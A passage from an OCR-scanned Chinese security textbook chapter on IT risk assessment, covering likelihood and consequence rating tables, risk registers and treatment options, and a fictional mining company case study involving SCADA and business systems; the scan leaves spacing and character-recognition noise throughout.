确定 一 旦 威胁 发 生 ， 将 对 组 织造 成 的 后 果 。 最 后 ,综合 这 些 信息 ， 对 每 个 威胁 形成 一 个 总 体 风 
险 等 级 。 理 想 情 况 是 将 可 能 性 用 概率 值 表示 ， 并 将 后 果 用 一 旦 风险 发 生 所 需 组 织 付出 的 货币 成 
本 表示 。 这 样 得 出 的 风险 可 以 简单 表示 为 

风险 三 威胁 发 生 的 概率 X 组 织 的 成 本 

这 相当 于 组 织 受 到 威胁 资产 的 价值 ， 因 而 可 以 说 明 ， 要 想 将 风险 发 生 概 率 降 低 到 可 以 接受 
的 水 平 ， 什 么 样 的 开支 水 平 是 合理 的 。 不 幸 的 是 ,通常 很 难 确定 准确 的 概率 或 者 实际 的 损失 成 
本 。 尤 其 是 对 无 形 资产 ， 比 如 商业 秘密 的 保密 性 受 损 。 因 此 ， 大 多 数 风 险 分 析 采 用 定性 方法 而 
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非 定 量 方法 对 上 述 两 项 评级 。 其 目标 是 得 出 风险 排序 ， 以 帮助 确定 哪个 风险 需要 最 优先 处 置 ， 
因而 不 需 给 出 绝对 数值 。 

分 析 已 有 控制 措施 ”在 确定 威胁 的 可 能 性 之 前 ， 需 要 识别 被 组 织 用 来 最 小 化 威胁 的 已 有 控 
制 措施 。 安 全 控制 措施 (control) 包括 通过 降低 威胁 源 利用 脆弱 性 的 能 力 来 减少 组 织 对 风险 的 
暴露 程度 的 管理 、 运 行 和 技术 方面 的 过 程 与 规程 。 通 过 使 用 核查 表 以 及 访谈 组 织 关 键 员工 以 征 
求 相 关 信 息 ， 可 以 识别 已 有 控制 措施 。 

确定 可 能 性 ”识别 了 已 有 控制 措施 之 后 ， 就 需要 确定 每 个 已 识别 威胁 发 生 并 对 某 些 资产 造 
成 损害 的 可 能 性 (likelihood)。 可 能 性 通常 定性 描述 ， 使 用 表 14-29 所 示 的 值 和 描述 。 尽 管 各 
种 风险 评估 标准 都 建议 了 类 似 的 表格 ,但 它们 在 细节 上 有 相当 大 的 差异 9S。 在 风险 评估 过 程 开 
始 阶 段 建立 情境 时 ， 具 体 描述 和 表格 就 确定 下 来 了 。 


表 14-2 风险 可 能 性 


等 级 扩展 的 定义 

I 仅仅 是 在 特殊 情况 下 才 会 发 生 ， 可 以 认为 “不 凑巧 ”或 非常 不 可 能 

2 可 能 会 在 某 些 时 候 发 生 ， 但 针对 当前 控制 措施 、 情 况 和 最 近 事态 ， 认 为 不 会 发 生 
3 可 能 会 在 某 些 时 候 发 生 ， 也 可 能 不 发 生 。 由 于 外 部 影响 ， 很 难 控制 是 否 发 生 

4 在 某 些 情况 下 将 很 可 能 发 生 ， 且 人 们 对 它 的 发 生 不 会 惊异 

5 几乎 必然 |” 认为 在 大 多 数 情况 下 会 发 生 ， 且 迟早 一 定 会 发 生 


到 底 哪个 等 级 更 合适 ， 在 这 个 问题 上 ,很 可 能 存在 不 确定 性 和 和 争论。 这 反映 了 等 级 划分 的 
定性 本 质 、 各 等 级 含义 的 模糊 性 和 威胁 最 终 发 生 的 可 能 性 的 不 确定 性 。 重 要 的 是 记 住 这 个 过 程 
的 目标 是 给 管理 层 就 存在 哪些 风险 提供 指南 ， 并 提供 足够 的 信息 来 帮助 管理 层 决定 怎样 做 出 最 
恰当 的 响应 。 任 何在 等 级 选择 上 的 不 确定 性 ， 都 应 当 在 对 选择 进行 讨论 时 给 予 关 注 ， 最 终 管理 
者 将 根据 这 些 信息 做 出 商业 决策 。 

风险 分 析 人 员 从 这 个 过 程 之 前 的 步骤 中 获得 资产 描述 和 威胁 /脆弱 性 细节 ， 根 据 组 织 的 总 
体 风险 环境 和 已 有 控制 措施 ， 确 定 适当 的 等 级 。 佑 算 方 法 与 特定 威胁 利用 一 个 或 一 组 资产 的 一 
个 或 多 个 脆弱 性 从 而 对 组 织造 成 损害 的 可 能 性 有 关 。 当 考虑 蓄意 的 人 为 威胁 源 时 ， 估 算 应 该 包 
括 对 攻击 者 意图 、 能 力 和 具体 攻击 目标 的 评价 。 上 有 具体 的 可 能 性 需要 结合 实际 情况 考虑 。 特 别 
地 ,“ 很 可 能 ”或 更 高 的 级 别 暗示 着 该 威胁 在 以 前 某 个 时 候 曾 发 生 过 。 这 意味 着 过 去 的 历史 记 
录 为 该 判断 提供 了 支持 依据 。 如 果 并 非 上 述 情形 ， 要 指定 上 述 值 就 需要 从 以 下 方面 证 明 其 合理 
性 : 威胁 环境 产生 了 显著 变化 ， 信 息 系 统 变更 削弱 了 系统 的 安全 性 ， 或 者 其 他 说 明 预 期 威胁 可 
能 发 生 的 理由 。 相 反 ,“ 不 可 能 ”和 “ 极 不 可 能 ”等 级 很 难 量化 。 它 们 只 是 表示 威胁 需要 考虑 ， 
但 是 否 会 发 生 很 难 确 定 。 一 般 情况 下 ， 这 样 的 威胁 仅仅 在 当 它 们 发 生 将 给 组 织带 来 严重 的 后 果 
时 才 会 考虑 ， 即 使 极其 不 可 能 发 生 。 | 

确定 对 组 织 的 后 果 /影响 分 析 人 员 接 下 来 必须 确定 每 一 个 威胁 最 终 发 生 所 造成 的 后 果 。 
注意 ， 这 与 威胁 发 生 的 可 能 性 既 不 相同 ， 也 不 相关 。 实 际 上 ， 后 果 ( consequence) 描述 表明 了 
所 讨论 的 特定 威胁 最 终 发 生 时 将 对 组 织造 成 的 影响 。 即 使 一 个 威胁 被 认为 是 “ 极 不 可 能 ”或 
“不 可 能 ， 如 果 一 旦 发 生 ， 组 织 将 遭受 严重 后 果 ， 那 么 显然 它 会 给 组 织带 来 风险 。 因 此 ， 必 须 
考虑 如 何 做 出 适当 的 响应 。 通 常 采 用 定性 描述 的 值 来 描述 后 果 ， 如 表 14-3 所 示 。 同 可 能 性 评 


O APVME 16-3 和 表 16-4， 改 编 自 ISO 27005, ISO 31000, [SASN06] 和 [SA04] 所 给 出 的 表格 ， 但 对 描述 
进行 了 扩展 和 推广 以 适用 于 范围 更 广 的 组 织 。 
O ”本章 所 选用 的 表格 与 其 他 一 些 标准 相 比 ， 能 说 明 一 种 更 为 精细 的 分 析 层 次 。 


级 一 样 ， 其 对 于 确定 最 佳 后 果 等 级 ， 也 有 一 定 的 不 确定 性 。 

后 果 等 级 的 确定 应 当 基 于 资产 拥有 者 和 组 织 管理 层 的 判断 ， 而 不 是 风险 分 析 人 员 的 意见 。 
这 与 可 能 性 的 确定 是 相反 的 。 具 体 的 后 果 需 要 结合 实际 情况 考虑 。 它 必须 与 特定 威胁 一 旦 发 生 
将 会 对 组 织造 成 的 整体 影响 联系 起 来 ， 而 并 不 仅仅 是 对 受 侵 害 系统 的 影响 。 一 个 特定 的 系统 
(如 某 个 位 置 的 服务 絮 ) 在 一 场 火灾 中 被 完全 毁坏 是 可 能 的 。 然 而 ， 这 对 组 织造 成 的 影响 会 有 
很 大 不 同 ， 可 能 造成 轻微 不 便 (该 服务 禹 位 于 分 支 机 构 ， 所 有 数据 在 其 他 地 方 存 有 备份 )， 也 
可 能 酿 成 巨大 灾难 (该 服务 器 中 存 有 茶 小 型 企业 的 所 有 客户 和 财务 记录 的 唯一 副本 )。 与 可 能 
性 等 级 一 样 ， 后 果 等 级 也 必须 在 了 解 组 织 当 前 的 工作 做 法 与 安排 的 基础 上 确定 。 特 别 地 ， 组 织 
是 否 具有 备份 、 灾 难 恢复 和 应 急 规划 也 会 影响 等 级 的 选择 。 


表 14-3 风险 后 果 
扩展 的 定义 


通常 是 在 单一 领域 的 轻微 安全 违规 的 结果 。 影 响 可 能 仅仅 持续 不 到 几 天 时 间 ， 仅仅 需 要 很 
少 的 开支 加 以 纠正 。 通 常 不 会 对 组 织 的 资产 造成 有 形 的 损害 


在 一 、 两 个 领域 安全 违规 的 结果 。 影 响 可 能 持续 不 到 一 周 ， 能 在 工段 或 项 目 层面 得 到 处 
轻微 ”| BL, 无 须 管理 者 介入 。 通 常 使 用 项 目 或 团队 的 资源 就 可 以 纠正 。 同 样 ， 对 组 织 的 资产 不 会 造 
成 有 形 的 损害 ， 但 事后 可 能 发 现 曾 因此 丧失 机 会 或 影响 效率 


有 限 的 系统 级 (可 能 是 持续 中 的 ) 安全 违规 。 影 响 持 续 时 间 可 达 两 周 ， 尽 管 仍 能 在 项 目 或 
3 中 等 ”| 团队 层面 处 理 ， 但 一 般 需 要 管理 者 介入 。 需 要 持续 的 合 规 成 本 来 解决 问题 。 客 户 或 公众 可 以 
间接 意识 到 或 得 到 与 此 相关 的 有 限 信息 


持续 中 的 系统 级 安全 违规 。 影 响 可 能 持续 4~8 周 ， 需 要 重要 管理 者 介入 以 及 相关 资源 来 处 
理 。 需 要 高 级 管理 层 在 事件 持续 期 间 保持 持续 的 直接 管理 ， 预 期 投入 大 量 合 规 成 本 。 客 户 或 
公众 能 意识 到 事态 的 发 生 ， 并 将 发 现 一 系列 重要 情况 。 有 可 能 造成 业务 或 组 织 成 果 的 损失 ， 
损失 的 程度 则 是 不 可 预料 的 ， 特 别 是 当 这 种 损失 只 会 发 生 一 次 的 时 候 


严重 的 系统 级 安全 违规 。 影 响 将 持续 3 个 月 或 更 多 ， 高 级 管理 层 需要 在 事态 持续 期 间 介 人 
来 解决 问题 。 预 期 投入 大 量 合 规 成 本 。 客 户 业 务 有 损失 或 其 他 对 组 织 的 严重 损害 可 能 出 现 。 
可 能 会 有 大 量 公众 或 政治 人 物 责备 组 织 并 对 组 织 失 去 信心 。 可 能 会 对 相关 人 员 追 究 刑事 责任 
或 纪律 处 分 


多 起 严重 的 系统 级 安全 违规 。 影 响 持续 时 间 无 法 确定 ， 高 级 管理 层 被 要 求 将 公司 转 入 目 愿 
托管 程序 或 进行 其 他 形式 的 重大 重组 。 预 计 对 高 级 管理 层 的 刑事 诉讼 将 开始 ， 无 法 避免 业 
务 的 重大 损失 ， 组 织 目标 无 法 实现 。 合 规 成 本 可 能 导致 多 年 亏损 ， 甚 至 可 能 造成 组 织 的 清 
算 结业 
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确定 最 终 的 风险 等 级 一 旦 每 个 特定 威胁 发 生 的 可 能 性 及 后 果 被 确定 ， 就 可 以 为 最 终 的 
风险 等 级 赋值 。 这 通常 是 通过 使 用 一 张 将 这 些 值 映射 到 风险 等 级 的 表 来 实现 ， 如 表 14-4 所 示 。 
该 表 详 细 说 明了 每 一 种 组 合 被 赋予 的 风险 等 级 。 这 样 的 表 提供 了 与 采用 定量 值 进行 理想 的 风险 
计算 等 效 的 定性 方法 。 它 也 给 出 了 对 这 些 赋 值 等 级 的 解释 。 


表 14-4 风险 等 级 确定 及 其 含义 
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( 续 ) 
风险 等 级 描述 


需要 执行 /董事 层 的 详细 研究 和 管理 计划 。 要 求 具 有 持续 的 规划 和 监视 并 定期 评审 。 需 要 对 管理 
风险 的 控制 措施 进行 重大 调整 ， 成 本 可 能 超过 最 初 的 预算 


需要 管理 层 重视 ， 但 管理 和 计划 可 以 交 给 高 级 项 目 或 团队 领导 承担 。 可 能 具有 持续 的 规划 和 监视 


Tr 

dki 并 定期 评审 ， 不 过 可 能 仅 限 在 已 有 资源 范围 内 对 控制 措施 进行 调整 

中 (M) 可 以 利用 已 有 的 特定 监视 和 响应 规程 加 以 控制 。 可 以 由 员工 通过 恰当 的 监视 和 评审 进行 管理 
低 (L) 可 以 通过 例 行 规程 加 以 控制 


将 结果 记录 到 风险 注册 表 风险 分 析 过 程 的 结果 应 当 记 录 到 风险 注册 表 。 其 中 应 包括 类 似 
K 14-5 所 示 的 汇总 表 。 风 险 通 常 按 等 级 降序 排列 。 包 括 基 本 原理 、 合 理性 证 明 以 及 文 持 证 据 
在 内 的 支撑 材料 详细 说 明 如 何 确 定 表 中 的 各 项 内 容 。 该 文件 的 目的 是 为 高 级 管理 层 提供 必要 的 
言 息 ， 以 便 对 如 何 对 已 识别 风险 进行 最 优 管理 一 类 事情 做 出 合理 的 决策 。 它 也 为 随后 是 否 根 据 
需要 进行 形式 化 的 风险 评估 过 程 提供 证 据 ， 还 对 已 做 决策 及 其 制定 原因 进行 了 记录 。 


表 14-5 风险 注册 表 


威胁 / 脆弱 性 已 有 控制 措施 风险 等 级 | 风险 优先 级 
意外 的 火灾 或 水 灾 | 无 (没有 灾难 恢复 计划 ) | 不 可 能 


14.4.4 评价 风险 


一 旦 确定 了 湾 在 的 重要 风险 的 相关 细节 ， 管 理 层 就 需要 决定 是 否 需要 采取 措施 做 出 啊 应 。 
这 需要 考虑 组 织 的 风险 状况 及 其 接受 某 个 风险 级 别 的 意愿 ， 而 这 些 是 在 风险 分 析 过 程 最 初 的 
“建立 情境 ”阶段 确定 的 。 那 些 风险 在 可 接受 级 别 以 下 的 项 目 通 第 被 接受 ， 不 需要 采取 进一步 
措施 。 而 风险 高 于 可 接受 水 平 的 项 目 则 需要 考虑 对 其 进行 处 置 。 


14.4.5 ”风险 处 置 


一 般 情况 下 ， 级 别 较 高 的 风险 也 是 那些 更 迫切 需要 采取 措施 的 风险 。 然 而 ， 可 能 有 些 风 
险 比 其 他 风险 处 理 起 来 更 容易 、 快 捷 和 经 济 。 在 
表 14-5 中 所 示 的 风险 注册 表 实 例 中 ， 两 个 风险 ” 极 高 
的 等 级 都 是 “高 ” 。 进 一 步 的 分 析 显 示 ， 对 第 一 
个 风险 来 说 ， 处 置 方法 相对 简单 和 经 济 ， 通 过 加 
固 路 由 器 配置 以 严格 限制 可 能 的 访问 即 可 。 而 处 
置 第 二 个 风险 则 需要 制定 一 个 完整 的 灾难 恢复 计 
划 ， 这 是 一 个 更 缓慢 、 成 本 更 高 的 过 程 。 因 此 ， 
管理 层 将 首先 采取 简单 的 措施 ， 以 尽快 地 改善 组 
织 的 总 体 风险 状况 。 管 理 层 甚至 可 以 出 于 业务 原 
因 ， 从 组 织 整体 角度 出 发 ， 决 定 某 些 低 等 级 风险 
在 其 他 风险 之 前 被 处 置 。 这 反映 出 在 风险 分 析 过 
程 中 要 从 整体 上 考虑 可 用 等 级 及 其 含义 和 组 织 管 
理 层 态 度 两 方面 因素 的 限制 。 低 

图 14-5 显示 了 成 本 与 风险 等 级 的 各 种 可 能 
组 合 。 如 果 处 置 成 本 高 ， 但 风险 低 ， 那 么 进行 这 图 14-5 ”对 风险 处 置 的 判断 
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间 的 区 域 是 最 难 做 出 决定 的 。 这 正 需要 管理 层 做 出 能 够 最 有 效 利 用 可 用 资源 的 业务 决策 。 做 决 
策 通 币 需 要 对 各 种 处 置 方法 进行 更 详细 的 调查 。 对 于 管理 层 处 置 已 识别 的 风险 ， 有 5 种 广义 的 
可 选 方案 : 
© © 风险 接受 : 出 于 业务 原因 而 选择 去 接受 超出 正常 的 风险 等 级 。 这 通常 是 由 于 处 置 这 些 风 
险 需 要 过 多 的 成 本 或 时 间 。 管 理 层 因而 必须 对 风险 发 生 对 组 织 所 造成 的 后 果 承 担 责任 。 
e 风险 规避 : 不 进行 会 产生 风险 的 活动 ， 不 运行 相关 系统 。 这 通常 导致 在 实现 某 些 对 组 
织 有 用 的 功能 时 不 方便 或 者 不 能 实现 。 能 力 的 损失 换 回 了 风险 水 平 的 降低 。 
© 风险 转移 : 与 第 三 方 共同 承担 风险 责任 。 典 型 的 措施 包括 : 对 可 能 发 生 的 风险 投保 ， 与 
为 一 家 组 织 签订 合同 ， 通 过 采取 合伙 或 合资 结构 来 分 担 威胁 发 生 所 带 来 的 风险 和 成 本 。 
© 减轻 后 果 : 通过 调整 具有 风险 的 资产 的 结构 来 减少 风险 发 生 时 对 组 织 所 造成 的 影响 。 
这 可 以 通过 实施 控制 措施 使 组 织 在 风险 发 生 后 迅速 恢复 来 实现 。 实 例 包 括 实施 场 外 备 
份 过 程 、 制 定 灾难 恢复 计划 、 把 数据 和 处 理 过 程 复 制 到 多 个 站 点 。 
减少 可 能 性 : 通过 实施 适宜 的 控制 措施 来 降低 脆弱 性 被 利用 的 机 会 。 这 可 以 包括 技术 
性 或 管理 性 的 控制 措施 ， 比 如 部 署 防火 墙 和 访问 令 牌 ， 或 更 改口 令 复杂 度 和 策略 之 类 
的 规程 。 实 施 这 些 控制 措施 的 目的 是 提高 资产 的 安全 ,减少 资产 的 脆弱 性 从 而 使 得 攻 
击 者 更 难 成 功 。 
如 果 选 择 了 最 后 两 种 可 选 方案 中 的 任何 一 种 ， 就 需要 选择 可 能 的 处 置 控 制 措施 ， 并 评价 其 
成 本 效益 。 有 大 量 可 供 采 用 的 管理 、 运 行 和 技术 控制 措施 。 可 对 这 些 控制 措施 进行 全 面 分 析 ， 
从 中 选择 那些 可 以 最 有 效 地 处 理 已 识别 威胁 的 控制 措施 ， 并 进行 成 本 效益 分 析 。 然 后 ， 管 理 层 
要 从 这 些 控制 措施 中 选择 应 该 采纳 的 ， 并 确定 其 实施 方案 。 第 15 间 介 绍 了 经 常 使 用 的 控制 措 
施 以 及 安全 计划 和 策略 的 使 用 ， 在 第 16 ~ 18 章 提 供 了 某 些 控制 域 的 更 多 细节 。 


14.5 RHF: 银 星 矿业 


我 们 用 一 个 案例 来 说 明 风 险 评估 过 程 9， 其 中 涉及 一 家 虚构 的 公司 一 一 银 星 矿业 。 银 星 矿 
业 是 一 个 本 地 运行 的 大 型 全 球 性 矿业 公司 。 它 有 一 套 被 许多 业务 领域 使 用 的 大 型 IT 基础 设施 。 
其 网 络 包 括 各 种 各 样 的 服务 器 ， 运 行 着 适合 于 其 组 织 规模 的 一 系列 应 用 软件 。 同 时 ， 它 也 使 用 
一 些 不 常用 的 应 用 程序 ， 其 中 的 一 些 直接 关系 到 井下 人 员 的 健康 和 安全 。 在 过 去 ， 这 些 系 统 许 
多 都 是 孤立 的 ， 在 它们 之 间 没 有 网 络 连接 。 最 近 几 年 ， 它 们 被 连接 到 了 一 起 ， 而 且 还 连接 到 了 
公司 的 内 部 网 以 提供 更 好 的 管理 能 力 。 然 而 ， 这 也 意味 着 现在 它们 有 了 被 因特网 访问 的 可 能 ， 
这 极 大 地 增加 了 这 些 系统 的 风险 。 

一 名 安全 分 析 员 按 约定 要 为 公司 提出 一 个 有 关 该 公司 风险 状况 的 初步 评价 意见 ， 并且 为 改 
善 公司 风险 状况 推荐 进一步 的 行动 方案 。 通 过 与 公司 管理 层 的 初步 讨论 ， 决 定 采用 一 个 组 合 的 
解决 方案 来 进行 安全 管理 。 这 需要 公司 的 IT 支持 小 组 对 他 们 的 系统 采用 适当 的 基线 标准 。 同 
时 ,分 析 员 被 要 求 对 关键 信息 系统 运行 进行 初步 的 形式 化 评估 ， 找 出 其 中 那些 风险 最 大 的 资 
产 ， 以 便 管理 部 门 之 后 考虑 如 何 处 置 。 

第 一 步 是 确定 风险 评 信 的 情境 。 因 为 矿产 业 公司 处 于 风险 图 谱 的 低 风 险 端 ， 因 此 不 太 可 能 
成 为 专门 攻击 的 目标 。 银 星 矿业 是 一 个 大 组 织 的 一 部 分 ， 因 此 它 受制 于 职业 健康 和 安全 的 法 律 
要 求 并 需要 对 股东 负责。 因此 ， 管 理 部 门 决定 一 般 情 况 下 只 接受 中 等 或 较 低 的 风险 。 这 个 风险 





日 ”这 个 实例 是 对 2003 年 Peter Hoek 的 学 习 实 例 的 改编 和 扩展 。 原 来 的 公司 名 称 和 可 识别 细节 已 经 根据 需要 进 


行 了 修改 。 
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评估 的 边界 被 具体 指定 为 ， 仅 包括 处 在 银 星 矿业 运营 部 门 直接 控制 下 的 系统 。 这 排除 了 广泛 的 
公司 内 部 网 、 中 心服 务 器 和 因特网 网 关 。 这 次 评估 得 到 了 银 星 的 IT 和 工程 经 理 的 支持 ， 该 结 
果 将 报告 给 公司 董事 会 。 评 估 将 采用 本 章 描 述 的 过 程 和 风险 等 级 。 

下 一 步 ， 需 要 识别 关键 资产 。 分 析 员 对 公司 的 关键 IT 和 工程 经 理 进行 了 访谈 。 许 多 工程 
经 理 都 强调 了 SCADA 网 络 和 结 点 的 可 靠 性 对 公司 的 重要 性 。 它 们 监控 着 公司 的 核心 采矿 作 
业 ， 并 且 使 运作 安全 和 高 效 ， 最 关键 的 是 它们 给 公司 带 来 了 收入 。 这 其 中 的 一 些 系统 还 维护 着 
法 律 需要 的 记录 ， 负 责 矿 产业 的 政府 部 门 会 定期 检查 这 些 记 录 。 任 何在 创建 、 维 护 或 导出 这 些 
记录 时 的 失误 ， 都 将 使 公司 面临 罚款 或 者 其 他 法 律 制裁 。 因 此 ， 这 些 系统 被 列 为 第 一 关键 资产 。 

很 多 IT 经 理 表 示 大 量 的 关键 数据 被 储存 在 各 式 各 样 的 文件 服务 硕 中 ， 或 者 分 布 在 独立 的 
文件 中 ， 或 者 在 数据 库 中 。 他 们 认为 这 些 数据 的 完整 性 对 公司 很 重要 。 这 些 数据 中 有 些 是 应 用 
程序 自动 生成 的 ， 其 他 则 是 由 员工 使 用 普通 办 公 软 件 生成 的 。 这 些 数据 有 一 部 分 需要 时 刻 准 备 
接受 政府 部 门 的 审计 。 还 有 生产 和 操作 的 数据 结果 、 合 同和 标书 、 人 事 资 料 、 应 用 软件 的 备 
份 、 运 营 和 资产 开支 、 采 矿 调 查 和 计划 ， 以 及 钻探 资料 等 数据 。 总 而 言 之 ， 这 些 存储 数据 的 完 
整 性 被 识别 为 第 二 关键 资产 。 

这 些 经 理 还 指出 三 个 关键 系统 一 一 财务 、 采 购 和 维护 /生产 服务 器 对 核心 业务 领域 的 高 效 
运作 是 至 关 重 要 的 。 任 何 对 这 些 系统 的 可 用 性 或 完整 性 的 损害 都 将 影响 到 公司 的 高 效 运作 能 
力 。 因 此 ， 它 们 中 的 每 一 个 系统 都 被 识别 为 关键 资产 。 

最 后 ， 通 过 对 公司 所 有 业务 部 门 进行 访谈 ， 分 析 员 认为 电子 邮件 也 是 一 个 关键 资产 。 电 子 
邮件 的 使 用 已 经 成 为 连接 所 有 业务 部 门 的 重要 工具 。 在 所 有 交流 中 ,大约 有 60% 是 以 电子 邮 
件 的 形式 进行 的 ， 它 常用 来 进行 日 常 的 通信 ， 联 系 对 象 包括 总 部 、 其 他 业务 单元 、 供 应 商 、 承 
包 商 等 ， 同 时 还 处 理 着 大 量 的 内 部 邮件 。 考 虑 到 公司 地 处 偏远 ， 所 以 电子 邮件 显得 更 为 重要 。 
因此 ， 电 子 邮 件 服务 共同 的 可 用 性 、 完 整 性 和 保密 性 被 列 为 关键 资产 。 

在 表 14-6 第 一 列 中 可 看 到 关键 资产 清单 ， 它 就 是 根据 风险 注册 表 在 风险 评估 过 程 结 束 时 
创建 的 。 


表 14-6 银 星 矿业 一 一 风险 注册 表 


A F 威胁 /脆弱 性 | ”已 有 控制 措施 风险 等 级 | 风险 优先 级 
SCADA 结 点 和 网 络 | ”控制 系统 的 非 | 分 层 的 防火 墙 和 | 极 不 可 能 | 严重 | 高 I 
的 可 靠 性 和 完整 性 ”| 授权 修改 服务 器 
储存 的 文件 和 数据 库 | ”信息 的 损坏 、| 防火墙、 策略 ”| 可 能 | 严重 | 极 高 
信息 的 完整 性 窃取 、 损 失 
财务 系统 的 可 用 性 和 | ”攻击 者 /影响 系 | 防火墙、 策略 
完整 性 统 的 错误 
采购 系统 的 可 用 性 和 | ”攻击 者 /影响 系 | 防火 墙 、 策略 | 可 能 | 中 等 
完整 性 统 的 错误 

维护 /生产 系统 的 可 | ”攻击 者 /影响 系 | 防火 墙 、 策 略 可 能 轻微 市 5 
用 性 和 完整 性 统 的 错误 
邮件 服务 的 可 用 性 、 | ”攻击 者 /影响 系 | ”防火墙 ext 邮 | 几乎 必然 | 轻微 
完整 性 和 机 密 性 统 的 错误 作风 


确定 了 关键 资产 清单 后 ， 分 析 员 需 要 识别 对 这 些 关键 资产 的 重要 威胁 并 确定 可 能 性 以 及 后 
果 的 值 。 对 SCADA 资产 的 主要 关注 点 是 源 自 外 部 对 结 点 的 非 授权 危害 。 这 些 系统 起 初 被 设计 
使 用 在 物理 隔离 且 可 信 的 网 络 上 ， 没 有 针对 现代 系统 的 外 部 攻击 强度 而 进行 强化 。 这 些 系统 党 


N 


ed 
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[482] 党 运行 较 老 版 本 的 操作 系统 ， 具 有 众所周知 的 不 安全 性 。 许 多 这 样 的 系统 还 没有 被 打上 补丁 或 


进行 升级 ， 运 行 的 关键 应 用 还 没有 升级 或 验证 能 够 运行 在 较 新 的 OS 版 本 上 。 最 近 ，SCADA 
网 络 已 经 被 连接 到 公司 的 内 部 网 上 ， 这 样 能 提供 更 强大 的 管理 和 监控 能 力 。 由 于 意识 到 SCADA 
结 点 很 可 能 是 不 安全 的 ， 这 些 连 接 通 过 和 颌 外 的 防火 载 和 代理 服务 系统 隐 离 在 公司 的 内 部 网 。 任 
何 针对 SCADA 结 点 的 外 部 攻击 必须 突破 公司 的 外 部 防火 墙 、 SCADA 网 络 防火 墙 和 代理 服务 
器 。 这 需要 一 系列 的 安全 缺口 。 然 而 ， 通 过 对 各 种 计算 机 犯罪 的 调查 结果 均 显 示 源 目 外 部 的 攻 
击 呈 现 上 升 趋势 ， 且 存在 对 SCADA 网 络 攻击 的 案例 ， 分 析 员 据 此 得 出 以 下 结论 ， 即 使 一 个 攻 
击发 生 的 可 能 性 很 小 ， 它 仍然 可 能 发 生 。 因 此 ， 我 们 选择 其 可 能 性 等 级 为 “ 极 不 可 能 ”。 分 析 
员 与 矿业 工程 师 们 讨论 了 SCADA 网 络 遭 受 一 个 成 功 攻击 的 后 果 。 他 们 认为 控制 系统 受到 干扰 
会 导致 严重 的 后 果 ， 因 为 它 影响 在 矿 中 工作 的 矿工 的 安全 。 通 风 、 大 面积 冷却 、 火 灾 预 防 、 人 
员 和 材料 吊 起 、 地 下 填充 系统 都 在 可 能 的 范围 之 内 ， 以 上 任何 一 项 受 损 都 将 导致 致命 事故 。 有 
毒物 质 的 溢出 并 进入 附近 的 下 水 道 可 能 导致 环境 破坏 。 另 外 ， 对 财务 状况 的 影响 是 很 大 的 ， 随 
着 时 间 的 推移 ， 花 费 会 以 每 小 时 数 千 万 美元 计算 。 还 有 一 种 可 能 是 ， 如 果 银 星 矿 业 被 发 现 违反 
了 法 律 要 求 ， 那 么 其 执照 可 能 被 吊销 。 因 此 后 果 等 级 选 为 “严重 ”。 最 终 风 险 等 级 为 “高 ”。 

对 于 第 二 个 资产 ， 关 注 储存 信息 的 完整 性 。 分 析 员 注意 到 ， 在 近期 的 计算 机 犯罪 调查 中 ， 
有 大 量 的 未 授权 使 用 文件 系统 和 数据 库 的 报告 。 源 目 内 部 和 外 部 的 攻击 都 会 危及 这 些 资产 。 有 
些 可 能 是 恶意 破坏 或 欺诈 行为 ， 有 些 可 能 是 对 信息 的 无 意 删除 、 修 改 或 泄露 。 所 有 这 些 都 表明 
违背 数据 库 安全 的 事件 正在 增加 ， 而 且 这 些 数据 资产 成 了 入 侵 者 的 主要 攻击 目标 。 这 些 系统 被 
设置 于 公司 的 内 部 网 上 ， 因 此 受到 公司 的 外 部 防火 墙 针对 外 部 访问 的 保护 。 然 而 ， 如 来 防火 墙 
被 攻破 或 攻击 者 使 用 已 控制 的 内 部 系统 获得 间接 的 访问 ， 是 有 可 能 威胁 到 数据 安全 的 。 关 于 内 
部 使 用 ， 公 司 对 在 数据 输入 和 操作 的 范围 上 做 了 规定 ， 特 别 是 那些 可 能 接受 审计 的 数据 。 公 司 
还 制定 了 服务 器 数据 备份 策略 。 然 而 ， 大 量 的 系统 ， 包 括 人 台式 机 和 服务 器 ， 被 用 来 创建 和 储存 
这 些 数 据 ， 这 意味 着 这 一 策略 的 执行 情况 是 未 知 的 。 因 此 其 可 能 性 等 级 选 为 “可 能 ”。 经 过 与 
公司 的 一 些 开 经 理 讨论 ， 显 示 出 这 其 中 的 部 分 信息 是 机 密 的 ， 如 采 泄 露 给 他 人 的 话 ， 将 会 造 
成 财务 损害 。 同 时 可 能 需要 潜在 的 财力 花费 用 于 恢复 数据 或 其 他 由 安全 违背 引起 的 善后 工作 .。 
如 果 个 人 信息 被 泄露 或 者 法 定 的 测试 结果 和 过 程 信息 丢失 ， 那么 也 可 能 导致 严重 的 法 律 后 果 。 
因此 ， 后 果 等 级 选 为 “严重 ”。 最 终 风 险 等 级 为 “ 极 高 ”。 

关键 的 财务 、 采 购 和 维护 /生产 系统 的 可 用 性 或 完整 性 ， 可 能 被 一 些 针 对 它们 使 用 的 操作 
系统 或 应 用 程序 的 攻击 所 损害 。 尽 管 在 公司 内 部 网 上 的 某 些 位 置 的 确 提供 了 一 些 防护 ， 由 于 公 
司 结构 的 特点 ， 许 多 这 样 的 系统 没有 被 定期 地 打 补 丁 或 维护 。 这 意味 着 至 少 一 些 系 统 ， 如 果 可 
以 访问 的 话 ， 在 面 对 一 系列 网 络 攻击 时 是 脆弱 的 。 公 司 外 部 防火 墙 拦截 攻 击 的 任何 一 次 失败 ， 
都 很 可 能 导致 一 些 系 统 被 自动 攻击 扫描 所 损害 。 其 发 生 的 速度 之 快 是 众所周知 的 ， 许 多 报告 显 
AN, 未 打 补 丁 的 系统 在 网 络 连接 后 每 隔 不 到 15 分 钟 就 会 受到 一 次 攻击 。 因 此 ， 可 能 性 等 级 被 
指定 为 “可 能 ”。 与 管理 层 的 讨论 显示 ， 损 害 的 程度 与 攻击 的 犯 围 和 持续 时 间 成 正比 。 在 许多 
案例 中 ， 都 有 至 少 一 部 分 系统 需要 被 重建 ， 花 费 也 是 相当 可 观 的 。 伪 造 的 订单 发 往 供应 商 或 者 
不 能 发 订单 将 对 公司 的 名 誉 产生 消极 的 影响 ， 并 可 能 产生 混乱 ， 甚 至 可 能 造成 停产 。 无 法 处 理 
人 事 考勤 表 或 无 法 利用 电子 基金 转账 ， 以 及 未 授权 的 资金 转账 ， 也 将 影响 到 公司 的 名 誉 并 可 能 
产生 财务 损失 。 公 司 显 示 维 护 /生产 系统 的 损坏 评价 应 当 稍 低 ， 由 于 工厂 具有 尽管 系统 受 损 而 
